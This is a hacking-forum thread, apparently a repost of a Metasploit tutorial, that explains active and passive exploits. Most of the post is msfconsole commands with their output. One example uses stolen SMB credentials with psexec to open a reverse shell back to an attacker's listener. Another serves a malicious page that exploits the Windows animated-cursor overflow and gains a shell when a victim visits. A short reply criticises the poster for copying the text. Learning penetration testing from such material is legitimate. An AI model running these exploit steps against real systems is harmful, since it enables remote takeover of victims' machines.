TARİHTE BUGÜN

Seçenekler

Working With Active And Passive Exploits In M.e.t.a sploit

DrEngerek - ait Kullanıcı Resmi (Avatar)
Stajyer Moderatör
Üyelik tarihi:
11/2015
Nereden:
Teşkilat
Mesajlar:
2.372
Konular:
250
Teşekkür (Etti):
314
Teşekkür (Aldı):
715
Ticaret:
(0) %
2 Hafta önce
#1
Working With Active And Passive Exploits In M.e.t.a sploit
All exploits in the m.e.t.asploit Framework will fall into two categories: active and passive.

ACTIVE EXPLOITS


Active exploits will exploit a specific host, run until completion, and then exit.


Alıntı:
Brute-force modules will exit when a shell opens from the victim.
Module execution stops if an error is encountered.
You can force an active module to the background by passing ‘-j’ to the exploit command:
Kod:
msf exploit(ms08_067_netapi) > exploit -j[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
EXAMPLE

Alıntı:
The following example makes use of a previously acquired set of credentials to exploit and gain a reverse shell on the target system.
Kod:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit
[*] Connecting to the server...[*] Started reverse handler[*] Authenticating as user 'victim'...[*] Uploading payload...[*] Created \hikmEeEM.exe...[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...[*] Obtaining a service manager handle...[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...[*] Closing service handle...[*] Opening service...[*] Starting the service...[*] Removing the service...[*] Closing service handle...[*] Deleting \hikmEeEM.exe...[*] Sending stage (240 bytes)[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
Alıntı:
PASSIVE EXPLOITS
Alıntı:
Passive exploits wait for incoming hosts and exploit them as they connect.

Passive exploits almost always focus on clients such as web browsers, FTP clients, etc.
They can also be used in conjunction with email exploits, waiting for connections.
Passive exploits report shells as they happen can be enumerated by passing ‘-l’ to the sessions command. Passing ‘-i’ will interact with a shell
Kod:
msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.5:52647 -> 192.168.1.100:4444

msf exploit(ani_loadimage_chunksize) > sessions -i 1[*] Starting interaction with 1...

meterpreter >
Alıntı:
EXAMPLE
The following output shows the setup to exploit the animated cursor vulnerability. The exploit does not fire until a victim browses to our malicious website.
Kod:
msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit[*] Exploit running as background job.
[*] Started reverse handler[*] Using URL: http://0.0.0.0:8080/[*]  Local IP: http://192.168.1.5:8080/[*] Server started.
msf exploit(ani_loadimage_chunksize) >[*] Attempting to exploit ani_loadimage_chunksize[*] Sending HTML page to 192.168.1.100:1077...[*] Attempting to exploit ani_loadimage_chunksize[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...[*] Sending stage (240 bytes)[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)

msf exploit(ani_loadimage_chunksize) > sessions -i 2[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Docu ments and Settings\victim\Desktop>
---------------------
Yanda Gördüğünüz Kişi:

Türkçü Miliyetçi Atatürkçü Bir Kişiliği Vardır.

R4V3N - ait Kullanıcı Resmi (Avatar)
Green Team (Deneyimli)
Üyelik tarihi:
07/2016
Nereden:
Rook island
Yaş:
21
Mesajlar:
6.085
Konular:
341
Teşekkür (Etti):
738
Teşekkür (Aldı):
2150
Ticaret:
(0) %
2 Hafta önce
#2
Cevap: Working With Active And Passive Exploits In M.e.t.a sploit
Half quote half code..

I believe in you but i think u dont wanna show even a lil bit effort on translate. Why dont u start to translate somethin?
---------------------
If opportunity doesn't knock, build a door.

Telegram: @r4v3nnn

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı